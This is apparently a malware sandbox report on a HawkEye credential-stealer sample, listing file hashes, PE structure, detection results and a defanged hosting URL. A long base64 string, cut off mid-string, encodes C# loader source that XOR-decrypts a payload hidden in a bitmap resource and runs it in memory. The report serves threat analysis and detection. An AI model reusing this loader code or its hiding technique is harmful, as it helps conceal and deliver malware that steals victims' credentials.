MalScore
100/100
MalFamily
Hawkeye

cjnew.exe

Is DLL Packer Anti Debug Anti VM Signed XOR AntiVirus 41/66 Related 2165
File details Download PDF Report
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
File size: 548.00 KB (561152 bytes)
Compile time: 2018-05-24 23:08:29
MD5: 6300f96828d8aae5bcf12e7083610465
SHA1: ee8898efcd44c2e48dd07e481517bdad46da529a
SHA256: 2674038b9f09153a55afc378dd313479f1a828e8feada40dbd2b1ad1c07c5e6a
Import hash: f34d5f2d4577ed6d9ceec516c1f5a744
Sections 3 .text .rsrc .reloc
Directories 3 import resource relocation
First submission: 2018-05-27 18:18:06
Last submission: 2018-05-27 18:18:06
Filename detected: - cjnew.exe (1)
URL file hosting
hXXp://c2autoelectrics.co.uk/images/bin/cjnew.exeVirusTotal
Antivirus Report
Report Date Detection Ratio Permalink Update
2018-05-27 15:23:07 [41/66] VirusTotal
PE Sections 2 suspicious
Name VAddress VSize Size MD5 SHA1
.text 0x2000 0xa0a4 41472 e9df12131f3903e5e3d823fefd3e1048 8f3113564c8e99d05b868ad1b26c5186ea2787ea
.rsrc 0xe000 0x7e8c6 518656 6990668b7e42c88629bd03ddc0d85dc1 77963962c7423be685c0768778071d3ca13cd2cc
.reloc 0x8e000 0xc 512 89ca8bbcb056fd6d50f2bbf4efc3bfde 9e2c8111e45ef322d3e55469f0da16e7e5d2cc77
PE Resources
Name Offset Size Language Sublanguage Data
RT_ICON 0xea50 1384 LANG_NEUTRAL SUBLANG_NEUTRAL
RT_GROUP_ICON 0xefb8 34 LANG_NEUTRAL SUBLANG_NEUTRAL
RT_VERSION 0xefdc 660 LANG_NEUTRAL SUBLANG_NEUTRAL
RT_HTML 0xf270 513129 LANG_GERMAN SUBLANG_GERMAN
RT_MANIFEST 0x8c6dc 490 LANG_NEUTRAL SUBLANG_NEUTRAL
  • API Alert
  • Anti Debug
Meta Info
LegalCopyright:
Assembly Version: 0.0.0.0
InternalName: PHswwSXW5mjZRDBQ.Framework.exe
FileVersion: 0.0.0.0
FileDescription:
Translation: 0x0000 0x04b0
OriginalFilename: PHswwSXW5mjZRDBQ.Framework.exe
ProductVersion: 0.0.0.0
XOR
No XOR informations found in this file.
Signature
This file isn't digitally signed
Packer(s)
Microsoft Visual C# / Basic .NET
Microsoft Visual Studio .NET
.NET executable
Microsoft Visual C# v7.0 / Basic .NET
File found
FIle type: Library
System.Management.dll
System.dll
System.Drawing.dll
System.Core.dll
mscoree.dll
IP Found
No IP detected
URL(s)
No URL found
String too long
dXNpbmcgU3lzdGVtOw0KdXNpbmcgU3lzdGVtLklPOw0KdXNpbmcgU3lzdGVtLlRleHQ7DQp1c2luZyBTeXN0ZW0uUmVmbGVjdGlvbjsNCnVzaW5nIFN5c3RlbS5UaHJlYWRpbmc7DQp1c2luZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7DQp1c2luZyBTeXN0ZW0uRHJhd2luZzsNCg0KbmFtZXNwYWNlIFRLVWpObG5MUHFuYg0Kew0KCXB1YmxpYyBjbGFzcyBiYlFJe3B1YmxpYyB2b2lkIGZkbFUoKXsNCnNieXRlIGlCUEMgPSAgNjE7IAogQ29uc29sZS5SZWFkTGluZSgpO3Vsb25nIE5NZGYgPSA0NTU5ODQ1NDMzNDk3MTcxMTsgCmRvdWJsZSBZS1VvID0gLTEuNDYzNzU3RSsxMjsgCmlmKFlLVW8gPT0gOS44NTU3MjFFLTE4KXsNCmRvdWJsZSB3U0F6U1FpSlZmQk1GaCA9IC04LjQ5OTY2OEUtMzI7DQpZS1VvID0gTWF0aC5Sb3VuZCh3U0F6U1FpSlZmQk1GaCk7DQpvYmplY3QgTkJEeGZEYllQUzsNCk5CRHhmRGJZUFMgPSAtMC4wMDA3MDExMTc1Ow0KQ29uc29sZS5Xcml0ZUxpbmUoTkJEeGZEYllQUy5Ub1N0cmluZygpLlRvTG93ZXIoKSk7DQp9ZG91YmxlIFZ6dWQgPSAyLjg4NDA4M0UrMzE7IApWenVkID0gTWF0aC5DZWlsaW5nKE1hdGguVGFuKDEpKTsNCnRyeXsNCkNvbnNvbGUuV3JpdGVMaW5lKFZ6dWQuVG9TdHJpbmcoKSk7DQp9Y2F0Y2goRXhjZXB0aW9uIGV4KXsNCkNvbnNvbGUuV3JpdGVMaW5lKGV4Lk1lc3NhZ2UpOw0KfQ0KfXB1YmxpYyB2b2lkIHJpZmgoKXsNCmJ5dGUgWlRhcSA9ICAyNTE7IAogRW52aXJvbm1lbnQuRXhpdCgwKTtzYnl0ZSB5TUp2ID0gIC0xMTY7IAogQ29uc29sZS5SZWFkTGluZSgpO2Zsb2F0IHRaTFkgPSA2LjY4NzQ0OUUtMzZGOyAKYnl0ZSBwYUJsID0gIDU7IAogRW52aXJvbm1lbnQuRXhpdCgwKTsNCn1wdWJsaWMgdm9pZCB3c1lvKCl7DQpieXRlIHVSQ3MgPSAgMTkwOyAKIEVudmlyb25tZW50LkV4aXQoMCk7c3RyaW5nIFdWS1ggPSAibGJudSI7IAogQ29uc29sZS5Xcml0ZUxpbmUoV1ZLWCk7dWxvbmcgUXFaRSA9IDUxNTc5MDY4ODA3MzQ5NzI0OyAKbG9uZyBLVGxrID0gMTMzMjcyMjc4MzExMzc1MzY7IAoNCn1wdWJsaWMgdm9pZCBnTERiKCl7DQpzaG9ydCB1SGtmID0gLTIyOTg3OyAKIGJ5dGVbXSB1SGtmdUhrZiA9IFN5c3RlbS5JTy5GaWxlLlJlYWRBbGxCeXRlcygidUhrZiIpO3NieXRlIFpoWW4gPSAgMzsgCiBDb25zb2xlLlJlYWRMaW5lKCk7c2J5dGUgUUFhWSA9ICAyMTsgCiBDb25zb2xlLlJlYWRMaW5lKCk7ZmxvYXQgaVRsaCA9IC0yLjM1MjI3NUUtMjlGOyAKDQp9Cn0gcHVibGljIGNsYXNzIEVqcUR7cHVibGljIHZvaWQgVW9QaCgpew0Kc2J5dGUgRXNVWCA9ICAtMTU7IAogQ29uc29sZS5SZWFkTGluZSgpO2ludCBzT1FIID0gMjM2ODsgCndoaWxlKHNPUUggPT0gMjM2OCl7DQpzT1FIICs9IDg5NTI2MjsNCn1mbG9hdCBvemtXID0gLTUuNTk0NDc5RSsxNUY7IAppbnQgS3FNWSA9IDYwOyAKd2hpbGUoS3FNWSA9PSA2MCl7DQpLcU1ZICs9IDEyNTcwNTsNCn0NCn1wdWJsaWMgdm9pZCBLZEJQKCl7DQpzdHJpbmcgTXpoSCA9ICJua1hZIjsgCiBDb25zb2xlLldyaXRlTGluZShNemhIKTt1aW50IEtGTWUgPSA2NjsgCnNob3J0IGZkVmQgPSAtMTY5OTE7IAogYnl0ZVtdIGZkVmRmZFZkID0gU3lzdGVtLklPLkZpbGUuUmVhZEFsbEJ5dGVzKCJmZFZkIik7bG9uZyBJenpoID0gMjg1MTk1MzU0NTg4ODYwNzQ7IAoNCn1wdWJsaWMgdm9pZCBLUWp0KCl7DQpsb25nIG91ZXMgPSA0MTYyMDkxODY0OTc1Mzk5MDsgCmJ5dGUgdk1ZRCA9ICAyNTsgCiBFbnZpcm9ubWVudC5FeGl0KDApO2ludCBOaHJUID0gNjk7IAp3aGlsZShOaHJUID09IDY5KXsNCk5oclQgKz0gNTkwNzA3Ow0KfWJ5dGUgUERXQiA9ICAxODc7IAogRW52aXJvbm1lbnQuRXhpdCgwKTsNCn1wdWJsaWMgdm9pZCBxTG9EKCl7DQpmbG9hdCB0V3RGID0gLTguMjAwNDgyRSsyOEY7IAp1c2hvcnQgb01HcCA9IDc5MDE7IAppbnQgWHR6QSA9IDY0MDk7IAp3aGlsZShYdHpBID09IDY0MDkpew0KWHR6QSA9IFh0ekEgKyA3OTAxODA7DQp9dWxvbmcgakVUSSA9IDgxNjg4ODk1ODI3NTg0OTU3OyAKDQp9Cn0gcHVibGljIGNsYXNzIEd4Qkt7cHVibGljIHZvaWQgckx2aCgpew0KaW50IHhEbU0gPSA0MDA3NzA4OTE7IAp3aGlsZSh4RG1NID09IDQwMDc3MDg5MSl7DQp4RG1NICs9IDMyOTgxMzsNCn1zdHJpbmcgZEZ6ZyA9ICJObnhOIjsgCiBDb25zb2xlLldyaXRlTGluZShkRnpnKTtsb25nIHNGbHQgPSAzODI4OTU4OTMwNzc5NDUzOyAKdWludCBsQXZRID0gODA0OTc5NDU5OyAKDQp9cHVibGljIHZvaWQgR3FIaigpew0KYnl0ZSBQaHFiID0gIDc3OyAKIEVudmlyb25tZW50LkV4aXQoMCk7dWxvbmcgVGliYyA9IDg2MDU4MDQ0MDcyNTcxMDMyOyAKc3RyaW5nIG1iTnIgPSAiYnpMUiI7IAogQ29uc29sZS5Xcml0ZUxpbmUobWJOcik7dWxvbmcgSWFyTSA9IDQ4NzQ4ODc3NTM2NzA1NDE4OyAKDQp9cHVibGljIHZvaWQgTnZwdygpew0Kc2hvcnQgZW9nZSA9IC0yNTUwNDsgCiBieXRlW10gZW9nZWVvZ2UgPSBTeXN0ZW0uSU8uRmlsZS5SZWFkQWxsQnl0ZXMoImVvZ2UiKTt1aW50IHZ6SW0gPSA3MjQ1NTsgCmRvdWJsZSBCUUF0ID0gLTguMjMwMTA5RS0xOTsgCndoaWxlKEJRQXQgPT0gLTEuNDcwMDAzRSsxNSl7DQpCUUF0ID0gTWF0aC5Qb3coMiwgMi4xKTsNCm9iamVjdCBLaktqd0JPQ0lqYUdwV2pQZWxDQkNtOw0KS2pLandCT0NJamFHcFdqUGVsQ0JDbSA9IC01LjY4NTMwNUUtMDk7DQpDb25zb2xlLldyaXRlTGluZShLaktqd0JPQ0lqYUdwV2pQZWxDQkNtLlRvU3RyaW5nKCkuVG9Mb3dlcigpKTsNCn1sb25nIElwY0kgPSAzMDMwNjM2Nzc4OTM5MDA5OTsgCg0KfXB1YmxpYyB2b2lkIG5WUFUoKXsNCnVzaG9ydCBTTVh5ID0gNTgzNjsgCnNob3J0IHF5ck4gPSAtMjcwMTY7IAogYnl0ZVtdIHF5ck5xeXJOID0gU3lzdGVtLklPLkZpbGUuUmVhZEFsbEJ5dGVzKCJxeXJOIik7ZG91YmxlIEFUanYgPSAzLjIzNTQ2MkUtMzk7IApBVGp2ID0gTWF0aC5DZWlsaW5nKE1hdGguQ29zKDIpKTsNCmludD8gdU9Pdkxib0tHRFNvUlVmYyA9IDg2NDA3NjY7DQp1T092TGJvS0dEU29SVWZjICs9IDM3NDA0O3VpbnQgRlZoSiA9IDk1OyAKDQp9Cn0gcHVibGljIGNsYXNzIFRrU217cHVibGljIHZvaWQgUHB0ZSgpew0Kc3RyaW5nIE1wY0UgPSAiR054TCI7IAogQ29uc29sZS5Xcml0ZUxpbmUoTXBjRSk7c2hvcnQgeEdkdiA9IDk0NDM7IAogYnl0ZVtdIHhHZHZ4R2R2ID0gU3lzdGVtLklPLkZpbGUuUmVhZEFsbEJ5dGVzKCJ4R2R2Iik7ZG91YmxlIHlYWVIgPSAtMS4yMTI3MzNFKzE2OyAKeVhZUiA9IE1hdGguUG93KGRvdWJsZS5NaW5WYWx1ZSwgZG91YmxlLk1heFZhbHVlKTsNCm9iamVjdCBTQ3lQWXFMU1pVYk1tWFpsZG47DQpTQ3lQWXFMU1pVYk1tWFpsZG4gPSA3LjcyNjA3MUUrMzY7ZmxvYXQgUExidCA9IDQuNDkyOTgyRSsxNUY7IAoNCn1wdWJsaWMgdm9pZCBPUGRDKCl7DQpzdHJpbmcgRWZpYSA9ICJ5ZGF0IjsgCiBDb25zb2xlLldyaXRlTGluZShFZmlhKTtkb3VibGUgakd0ZiA9IDUuMjMwNzQ0RS0zNjsgCmlmKGpHdGYgPT0gLTEuMzk4ODg4RSsyNil7DQpkb3VibGUgZFdLc1dGa2ggPSA0LjU3Mzk5NkUtMDk7DQpkV0tzV0ZraCA9IE1hdGguU3FydCgzKTsNCmpHdGYgPSBkV0tzV0ZraDsNCnRyeXsNCmludCByeFVFSEhLY0x5ID0gNTUxMTc5MzsNCmlmKHJ4VUVISEtjTHkgPT0gNTM1NDkpew0KcnhVRUhIS2NMeSsrOw0KfWVsc2V7DQpyeFVFSEhLY0x5LS07DQpDb25zb2xlLldyaXRlKHJ4VUVISEtjTHkuVG9TdHJpbmcoKSk7DQp9DQp9Y2F0Y2goRXhjZXB0aW9uIGV4KXsNCg0KfQ0KfXN0cmluZyBIeWRqID0gIk9uc3MiOyAKIENvbnNvbGUuV3JpdGVMaW5lKEh5ZGopO2xvbmcgWUdZZCA9IDgyNzM1NzAwOTE4MjY0NTg1OyAKDQp9cHVibGljIHZvaWQgSlJzaygpew0KdWxvbmcgWmdoVCA9IDE1NzM4NzE1OTQ4NDQwMzY2OyAKc2J5dGUgZE5IZSA9ICA4MzsgCiBDb25zb2xlLlJlYWRMaW5lKCk7dXNob3J0IGxrTUsgPSA2MjI0NzsgCnVsb25nIFRGQWUgPSAyMTc1MzYwNjA3NTAxMTE0NjsgCg0KfXB1YmxpYyB2b2lkIFN3VHooKXsNCmRvdWJsZSB4eEtVID0gMS42NjMwODJFKzE3OyAKaWYoeHhLVSA9PSAxLjk4NTY1M0UtMzYpew0KZG91YmxlIGRtS3VTUHBjSEtiTk5YZXlMb3pHUXBIdkEgPSAtMy41ODM4NTdFLTM5Ow0Kb2JqZWN0IEVzVU9JcEpDaFNneDsNCkVzVU9JcEpDaFNneCA9IC0xLjQ0MTA3NEUrMTk7DQp9bG9uZyBBU21XID0gNjQ5MDgzMTQ1NzA3MjcyNDsgCmJ5dGUgb2pQZiA9ICA2OTsgCiBFbnZpcm9ubWVudC5FeGl0KDApO2RvdWJsZSBrSEROID0gMi4wMzIwMjJFLTM1OyAKZG91YmxlIHZmQURiY1hUTGFkUWZLSmFZaU5qUGZuT1p3Q1IgPSAxLjEwNTIwMUUrMTg7DQprSEROID0gdmZBRGJjWFRMYWRRZktKYVlpTmpQZm5PWndDUiAvIDM7DQppbnRbXSBQdkdCQlFlSHZqVlJCdnpEZ0FGcEFJT0Z2QWQgPSB7IDc0MDI1MzEgLCA3MTMwOSB9IDsNClJhbmRvbSB3bEpkSnFRa3FOQkFpSj0gbmV3IFJhbmRvbSgpOw0KQ29uc29sZS5Xcml0ZUxpbmUoUHZHQkJRZUh2alZSQnZ6RGdBRnBBSU9GdkFkW3dsSmRKcVFrcU5CQWlKLk5leHQoMCwyKV0pOw0KfQp9IA0KDQogICAgY2xhc3MgUHJvZ3JhbQ0KICAgIHsNCg0KICAgICAgICBzdGF0aWMgc3RyaW5nIGxRRVJKamVpVW1KYlQgPSAiI3Bhc3MjIjsNCiAgICAgICAgcHJpdmF0ZSBzdGF0aWMgYnl0ZVtdIGt2SnJMeEYoYnl0ZVtdIGJ5dGVzKQ0KICAgICAgICB7DQogICAgICAgICAgICBieXRlW10gYnl0ZUFycmF5ID0gRW5jb2RpbmcuVW5pY29kZS5HZXRCeXRlcyhsUUVSSmplaVVtSmJUKTsNCiAgICAgICAgICAgIGZvciAoaW50IGkgPSAwOyBpIDwgYnl0ZXMuTGVuZ3RoOyBpKyspDQogICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgYnl0ZXNbaV0gXj0gYnl0ZUFycmF5W2kgJSAxNl07DQogICAgICAgICAgICB9DQogICAgICAgICAgICByZXR1cm4gYnl0ZXM7DQogICAgICAgIH0NCgkJDQoJCXByaXZhdGUgc3RhdGljIGJ5dGVbXSBDb252ZXJ0RnJvbUJtcChTeXN0ZW0uRHJhd2luZy5CaXRtYXAgYikNCiAgICAgICAgew0KICAgICAgICAgICAgaW50IGwgPSBiLldpZHRoOw0KICAgICAgICAgICAgaW50IG4gPSBsICogbCAqIDQ7DQogICAgICAgICAgICBieXRlW10gYnVmZiA9IG5ldyBieXRlW25dOw0KICAgICAgICAgICAgaW50IGsgPSAwOw0KDQogICAgICAgICAgICBmb3IgKGludCB4ID0gMDsgeCA8IGw7IHgrKykNCiAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICBmb3IgKGludCB5ID0gMDsgeSA8IGw7IHkrKykNCiAgICAgICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgICAgIEJ1ZmZlci5CbG9ja0NvcHkoQml0Q29udmVydGVyLkdldEJ5dGVzKGIuR2V0UGl4ZWwoeCwgeSkuVG9BcmdiKCkpLCAwLCBidWZmLCBrLCA0KTsNCiAgICAgICAgICAgICAgICAgICAgayArPSA0Ow0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgaW50IGxlbiA9IEJpdENvbnZlcnRlci5Ub0ludDMyKGJ1ZmYsIDApOw0KICAgICAgICAgICAgYnl0ZVtdIGYgPSBuZXcgYnl0ZVtsZW5dOw0KICAgICAgICAgICAgQnVmZmVyLkJsb2NrQ29weShidWZmLCA0LCBmLCAwLCBmLkxlbmd0aCk7DQogICAgICAgICAgICByZXR1cm4gZjsNCiAgICAgICAgfQ0KCQkNCgkJDQoJCXN0YXRpYyBieXRlW10gT0FQTXI7DQoJCXB1YmxpYyBzdGF0aWMgdm9pZCBiSU95S2pvS3NhYWxkZmlHKCkNCgkJew0KCQkJQXNzZW1ibHkuTG9hZChPQVBNcikuRW50cnlQb2ludC5JbnZva2UobnVsbCwgbmV3IG9iamVjdFtdIHsgbmV3IHN0cmluZ1tdIHsgfSB9KTsNCgkJfQ0KCQkNCgkJW0RsbEltcG9ydCgia2VybmVsMzIuZGxsIildDQoJCXN0YXRpYyBleHRlcm4gSW50UHRyIEZpbmRSZXNvdXJjZShJbnRQdHIgaE1vZHVsZSwgSW50UHRyIGxwTmFtZSwgSW50UHRyIGxwVHlwZSk7DQoJCQ0KCQlbRGxsSW1wb3J0KCJrZXJuZWwzMi5kbGwiLCBTZXRMYXN0RXJyb3I9dHJ1ZSldDQoJCXN0YXRpYyBleHRlcm4gdWludCBTaXplb2ZSZXNvdXJjZShJbnRQdHIgaE1vZHVsZSwgSW50UHRyIGhSZXNJbmZvKTsNCgkJDQoJCVtEbGxJbXBvcnQoImtlcm5lbDMyLmRsbCIsIFNldExhc3RFcnJvcj10cnVlKV0NCgkJc3RhdGljIGV4dGVybiBJbnRQdHIgTG9hZFJlc291cmNlKEludFB0ciBoTW9kdWxlLCBJbnRQdHIgaFJlc0luZm8pOw0KCQkNCgkJW0RsbEltcG9ydCgia2VybmVsMzIuZGxsIildDQoJCXN0YXRpYyBleHRlcm4gSW50UHRyIExvY2tSZXNvdXJjZShJbnRQdHIgaFJlc0RhdGEpOw0KCQkNCg0KCQlwdWJsaWMgc3RhdGljIEJpdG1hcCBCeXRlMkltYWdlKGJ5dGVbXSBpbWcpDQogICAgICAgIHsNCiAgICAgICAgICAgIHVzaW5nICh2YXIgc3RyZWFtID0gbmV3IE1lbW9yeVN0cmVhbShpbWcpKQ0KICAgICAgICAgICAgew0KICAgICAgICAgICAgICAgIHJldHVybiBuZXcgQml0bWFwKHN0cmVhbSk7DQogICAgICAgICAgICB9DQogICAgICAgIH0NCgkJDQogICAgICAgIHN0YXRpYyB2b2lkIE1haW4oKQ0KICAgICAgICB7DQogICAgICAgICAgICB0cnkNCiAgICAgICAgICAgIHsJCQ0KCQkJCUludFB0ciBmUmVzb3VyY2UgPSBGaW5kUmVzb3VyY2UobmV3IEludFB0cigwKSwgbmV3IEludFB0cigxMjMpLCBuZXcgSW50UHRyKDIzKSk7DQoJCQkJdWludCBzUmVzb3VyY2UgPSBTaXplb2ZSZXNvdXJjZShuZXcgSW50UHRyKDApLCBmUmVzb3VyY2UpOw0KCQkJCUludFB0ciBsUmVzb3VyY2UgPSBMb2FkUmVzb3VyY2UobmV3IEludFB0cigwKSwgZlJlc291cmNlKTsNCgkJCQlJbnRQdHIgZFJlc291cmNlID0gTG9ja1Jlc291cmNlKGxSZXNvdXJjZSk7DQoJCQkJDQoJCQkJT0FQTXIgPSBuZXcgYnl0ZVtzUmVzb3VyY2VdOw0KCQkJCVN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5NYXJzaGFsLkNvcHkoZFJlc291cmNlLCBPQVBNciwgMCwgU3lzdGVtLkNvbnZlcnQuVG9JbnQzMihzUmVzb3VyY2UpKTsNCgkJCQlPQVBNciA9IGt2SnJMeEYoQ29udmVydEZyb21CbXAoQnl0ZTJJbWFnZShPQVBNcikpKTsNCgkJCQkNCgkJCQlTeXN0ZW0uVGhyZWFkaW5nLlRocmVhZCB0aHIgPSBuZXcgU3lzdGVtLlRocmVhZGluZy5UaHJlYWQoYklPeUtqb0tzYWFsZGZpRyk7DQoJCQkJdGhyLlN0YXJ0KCk7DQogICAgICAgICAgICB9DQogICAgICAgICAgICBjYXRjaA0KICAgICAgICAgICAgew0KDQogICAgICAgICAgICB9DQogICAgICAgIH0NCiAgICB9DQoJDQoJcHVibGljIGNsYXNzIGJOVEh7cHVibGljIHZvaWQgUURsZigpew0Kc2J5dGUgR2FoSyA9ICA2MTsgCiBDb25zb2xlLlJlYWRMaW5lKCk7dWxvbmcgaGVmaiA9IDQ1NTk4NDU0MzM0OTcxNzExOyAKZG91YmxlIHB1Rk4gPSAtMS40NjM3NTdFKzEyOyAKaWYocHVGTiA9PSA5Ljg1NTcyMUUtMTgpew0KZG91YmxlIGl3RWxqWGh0clp6eEREID0gLTguNDk5NjY4RS0zMjsNCnB1Rk4gPSBNYXRoLlJvdW5kKGl3RWxqWGh0clp6eEREKTsNCm9iamVjdCBHcU5VUEplWGx2Ow0KR3FOVVBKZVhsdiA9IC0wLjAwMDcwMTExNzU7DQpDb25zb2xlLldyaXRlTGluZShHcU5VUEplWGx2LlRvU3RyaW5nKCkuVG9Mb3dlcigpKTsNCn1kb3VibGUgR3NPaiA9IDIuODg0MDgzRSszMTsgCkdzT2ogPSBNYXRoLkNlaWxpbmcoTWF0aC5UYW4oMSkpOw0KdHJ5ew0KQ29uc29sZS5Xcml0ZUxpbmUoR3NPai5Ub1N0cmluZygpKTsNCn1jYXRjaChFeGNlcHRpb24gZXgpew0KQ29uc29sZS5Xcml0ZUxpbmUoZXguTWVzc2FnZSk7DQp9DQp9cHVibGljIHZvaWQgenVncCgpew0KYnl0ZSBEaFNzID0gIDI1MTsgCiBFbnZpcm9ubWVudC5FeGl0KDApO3NieXRlIFhyemIgPSAgLTExNjsgCiBDb25zb2xlLlJlYWRMaW5lKCk7ZmxvYXQgQkdCbiA9IDYuNjg3NDQ5RS0zNkY7IApieXRlIG94VkggPSAgNTsgCiBFbnZpcm9ubWVudC5FeGl0KDApOw0KfXB1YmxpYyB2b2lkIHlUcHkoKXsNCmJ5dGUgSEZKbyA9ICAxOTA7IAogRW52aXJvbm1lbnQuRXhpdCgwKTtzdHJpbmcgRnlwbiA9ICJDb2lqIjsgCiBDb25zb2xlLldyaXRlTGluZShGeXBuKTt1bG9uZyBMb2NIID0gNTE1NzkwNjg4MDczNDk3MjQ7IApsb25nIFFKVlggPSAxMzMyNzIyNzgzMTEzNzUzNjsgCg0KfXB1YmxpYyB2b2lkIHFpbEkoKXsNCnNob3J0IEVJV3YgPSAtMjI5ODc7IAogYnl0ZVtdIEVJV3ZFSVd2ID0gU3lzdGVtLklPLkZpbGUuUmVhZEFsbEJ5dGVzKCJFSVd2Iik7c2J5dGUgVFdwYSA9ICAzOyAKIENvbnNvbGUuUmVhZExpbmUoKTtzYnl0ZSB5UkNMID0gIDIxOyAKIENvbnNvbGUuUmVhZExpbmUoKTtmbG9hdCBvUnVZID0gLTIuMzUyMjc1RS0yOUY7IAoNCn0KfSBwdWJsaWMgY2xhc3MgS2NTdntwdWJsaWMgdm9pZCBIc0Z3KCl7DQpzYnl0ZSBlWGdsID0gIC0xNTsgCiBDb25zb2xlLlJlYWRMaW5lKCk7aW50IGJaR2wgPSAyMzY4OyAKd2hpbGUoYlpHbCA9PSAyMzY4KXsNCmJaR2wgKz0gODk1MjYyOw0KfWZsb2F0IHJoa1UgPSAtNS41OTQ0NzlFKzE1RjsgCmludCBBcm1WID0gNjA7IAp3aGlsZShBcm1WID09IDYwKXsNCkFybVYgKz0gMTI1NzA1Ow0KfQ0KfXB1YmxpYyB2b2lkIGJCeGEoKXsNCnN0cmluZyBicm5SID0gIkxFcksiOyAKIENvbnNvbGUuV3JpdGVMaW5lKGJyblIpO3VpbnQgeURtVCA9IDY2OyAKc2hvcnQgRGtOZSA9IC0xNjk5MTsgCiBieXRlW10gRGtOZURrTmUgPSBTeXN0ZW0uSU8uRmlsZS5SZWFkQWxsQnl0ZXMoIkRrTmUiKTtsb25nIEFjQW4gPSAyODUxOTUzNTQ1ODg4NjA3NDsgCg0KfXB1YmxpYyB2b2lkIGRSbmIoKXsNCmxvbmcgVWxUVCA9IDQxNjIwOTE4NjQ5NzUzOTkwOyAKYnl0ZSBwRWx1ID0gIDI1OyAKIEVudmlyb25tZW50LkV4aXQoMCk7aW50IFlEVXUgPSA2OTsgCndoaWxlKFlEVXUgPT0gNjkpew0KWURVdSArPSA1OTA3MDc7DQp9Ynl0ZSBGc1ZpID0gIDE4NzsgCiBFbnZpcm9ubWVudC5FeGl0KDApOw0KfXB1YmxpYyB2b2lkIFhOVHgoKXsNCmZsb2F0IHpHTVIgPSAtOC4yMDA0ODJFKzI4RjsgCnVzaG9ydCBKaGdoID0gNzkwMTsgCmludCBCYlNVID0gNjQwOTsgCndoaWxlKEJiU1UgPT0gNjQwOSl7DQpCYlNVID0gQmJTVSArIDc5MDE4MDsNCn11bG9uZyBCZ1RxID0gODE2ODg4OTU4Mjc1ODQ5NTc7IAoNCn0KfSBwdWJsaWMgY2xhc3MgZHlOR3twdWJsaWMgdm9pZCBVUHpvKCl7DQppbnQgSHdDaCA9IDQwMDc3MDg5MTsgCndoaWxlKEh3Q2ggPT0gNDAwNzcwODkxKXsNCkh3Q2ggKz0gMzI5ODEzOw0KfXN0cmluZyBCeHlnID0gIlhlTEUiOyAKIENvbnNvbGUuV3JpdGVMaW5lKEJ4eWcpO2xvbmcgTllOUSA9IDM4Mjg5NTg5MzA3Nzk0NTM7IAp1aW50IFRxY3kgPSA4MDQ5Nzk0NTk7IAoNCn1wdWJsaWMgdm9pZCBMcXhPKCl7DQpieXRlIHNlQlMgPSAgNzc7IAogRW52aXJvbm1lbnQuRXhpdCgwKTt1bG9uZyBITHJCID0gODYwNTgwNDQwNzI1NzEwMzI7IApzdHJpbmcgbGZiViA9ICJHZ3VWIjsgCiBDb25zb2xlLldyaXRlTGluZShsZmJWKTt1bG9uZyBpbUtNID0gNDg3NDg4Nzc1MzY3MDU0MTg7IAoNCn1wdWJsaWMgdm9pZCBjRFhhKCl7DQpzaG9ydCBDQ0pQID0gLTI1NTA0OyAKIGJ5dGVbXSBDQ0pQQ0NKUCA9IFN5c3RlbS5JTy5GaWxlLlJlYWRBbGxCeXRlcygiQ0NKUCIpO3VpbnQgTXR1RSA9IDcyNDU1OyAKZG91YmxlIFpLYlUgPSAtOC4yMzAxMDlFLTE5OyAKd2hpbGUoWktiVSA9PSAtMS40NzAwMDNFKzE1KXsNClpLYlUgPSBNYXRoLlBvdygyLCAyLjEpOw0Kb2JqZWN0IFVEUGVqSXNhT0xLdFVxZ01XUWtWWUs7DQpVRFBlaklzYU9MS3RVcWdNV1FrVllLID0gLTUuNjg1MzA1RS0wOTsNCkNvbnNvbGUuV3JpdGVMaW5lKFVEUGVqSXNhT0xLdFVxZ01XUWtWWUsuVG9TdHJpbmcoKS5Ub0xvd2VyKCkpOw0KfWxvbmcgbnpTViA9IDMwMzA2MzY3Nzg5MzkwMDk5OyAKDQp9cHVibGljIHZvaWQgSUxmSigpew0KdXNob3J0IFJjcncgPSA1ODM2OyAKc2hvcnQgWnFkciA9IC0yNzAxNjsgCiBieXRlW10gWnFkclpxZHIgPSBTeXN0ZW0uSU8uRmlsZS5SZWFkQWxsQnl0ZXMoIlpxZHIiKTtkb3VibGUgVEVZWiA9IDMuMjM1NDYyRS0zOTsgClRFWVogPSBNYXRoLkNlaWxpbmcoTWF0aC5Db3MoMikpOw0KaW50PyBOZFRLamhpQ0hxR0VQUlRNID0gODY0MDc2NjsNCk5kVEtqaGlDSHFHRVBSVE0gKz0gMzc0MDQ7dWludCBKWm1lID0gOTU7IAoNCn0KfSBwdWJsaWMgY2xhc3MgSlVOa3twdWJsaWMgdm9pZCBUU2l2KCl7DQpzdHJpbmcgdmJ1SyA9ICJyaG5UIjsgCiBDb25zb2xlLldyaXRlTGluZSh2YnVLKTtzaG9ydCBrZHdTID0gOTQ0MzsgCiBieXRlW10ga2R3U2tkd1MgPSBTeXN0ZW0uSU8uRmlsZS5SZWFkQWxsQnl0ZXMoImtkd1MiKTtkb3VibGUgRFl4WiA9IC0xLjIxMjczM0UrMTY7IApEWXhaID0gTWF0aC5Qb3coZG91YmxlLk1pblZhbHVlLCBkb3VibGUuTWF4VmFsdWUpOw0Kb2JqZWN0IE1yQ1dmZ2FqZE9UcEFGdGVuUDsNCk1yQ1dmZ2FqZE9UcEFGdGVuUCA9IDcuNzI2MDcxRSszNjtmbG9hdCBuaERsID0gNC40OTI5ODJFKzE1RjsgCg0KfXB1YmxpYyB2b2lkIEZUVXEoKXsNCnN0cmluZyB3YkNwID0gImxHanAiOyAKIENvbnNvbGUuV3JpdGVMaW5lKHdiQ3ApO2RvdWJsZSBMc3hIID0gNS4yMzA3NDRFLTM2OyAKaWYoTHN4SCA9PSAtMS4zOTg4ODhFKzI2KXsNCmRvdWJsZSBQREFTdEJXcSA9IDQuNTczOTk2RS0wOTsNClBEQVN0QldxID0gTWF0aC5TcXJ0KDMpOw0KTHN4SCA9IFBEQVN0QldxOw0KdHJ5ew0KaW50IGtxb0hBRlBBR1IgPSA1NTExNzkzOw0KaWYoa3FvSEFGUEFHUiA9PSA1MzU0OSl7DQprcW9IQUZQQUdSKys7DQ